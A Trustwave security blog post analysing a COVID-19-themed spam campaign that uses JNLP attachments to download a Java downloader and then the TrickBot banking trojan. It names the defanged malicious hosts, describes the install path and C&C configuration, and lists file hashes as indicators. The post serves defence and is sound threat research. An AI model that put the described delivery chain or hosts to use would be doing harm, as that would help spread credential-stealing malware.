Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

TrickBot Disguised as COVID-19 Map

Cybercriminals are continuously exploiting the Coronavirus (COVID-19) pandemic. In our quest to monitor the COVID-19 related spams, we recently spotted one interesting campaign which uses an unusual email attachment to deliver TrickBot malware.

Campaign_flow
Figure 1: The spam campaign flow

 

The Road to TrickBot

The email, claiming to be from a volunteer organization which helps with those seeking COVID-19 financial aid, entices the email recipient to open the attachments – fake COVID-19 forms.

 

Email_sample
Figure 2: Trustwave Security Email Gateway displaying a recent COVID-19 spam

 

The attachments are Java Network Launch Protocol (JNLP) files. JNLP files are XML formatted files which can be used to launch java programs hosted on a remote server to the client machine. If the client machine has Java Runtime Environment (JRE) installed, JNLP files can be executed via a double click, as JRE includes the technology Java Web Start which can run such files.

In Figure 2, the two JNLP attachments are identical. Once executed, they will download and run the java program “map.jar” hosted at “http[s]://mapcovid[.]net” – a second stage downloader disguised as COVID-19 "Map" java program.

 

Jnlp_attachment
Figure 3: The attachment SARS-2_Form.jnlp, a fake COVID-19 form, is a downloader
 
Downloaded_jar
Figure 4: The second stage downloader “map.jar” will download and execute the main malware “map.exe”

 

The downloaded file “map.jar” will launch the World Health Organization’s (WHO) “Q&A on coronaviruses (COVID-19)” webpage to cover up its malicious behavior – the downloading and installation of the main malware. This malware, concealed as a COVID-19 “Map” executable, will be downloaded from “http[s]://basecovid[.]com/map[.]exe” then saved and executed as %appdata%/map.exe.

The second downloaded file “map.exe” is the modularized banking trojan called TrickBot. This malware is prominent nowadays due to its wide range of functionalities: stealing information, downloading of other malwares, spam emails, etc.

The TrickBot %appdata%/map.exe will be automatically executed via the Execute() function of “map.jar”. Once run, it will create its installation folder SpotifyMusic at the Startup folder then drop a copy of itself. It will also create an encrypted file “settings.ini” – that contains the configuration of the TrickBot.

 

Trickbot_installation_folder
Figure 5: Installation path of the downloaded TrickBot
 
Config_decrypted
Figure 6: Decrypted TrickBot configuration

 

The decrypted TrickBot configuration contains vital information which will be used during the communication of the TrickBot executable to the C&Cs. It includes the version of the currently installed “map.exe” and its group tag <gtag>, the list of IP addresses of the C&Cs, and the first module to be downloaded by “map.exe”.

C&c
Figure 7: The memory dump of TrickBot “map.exe” showing the first request to its C&C

 

Summary

Malware authors are continuously taking advantage the COVID-19 pandemic in their spams. Like other cybercriminals, the threat actors behind this TrickBot malware are unleashing their creativity on crafting the initial arrival vector of their malware. Often, we observe TrickBot being delivered as payloads of malicious document attachments, particularly macro downloaders. This is the first time we have witnessed TrickBot use JNLP files as downloaders. In fact, the use of JNLP files as email attachments, to deliver malware, is not common.

It’s likely we shall see more of this kind of threat. We would recommend blocking *.jnlp files at your email gateway. We have added protections for this threat to the Trustwave Secure Email Gateway for our customers.

 

IOCs

SARS-2_Form.jnlp    SHA1: 46576bfebaecaacc4600bba429016b0713238f52
map.jar    SHA1: 0068154fbc4374642ebe50ac4f822c64b45635c8
map.exe    SHA1: 55b031294ff24919547cfcb4fd4f10a02902ce3b

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo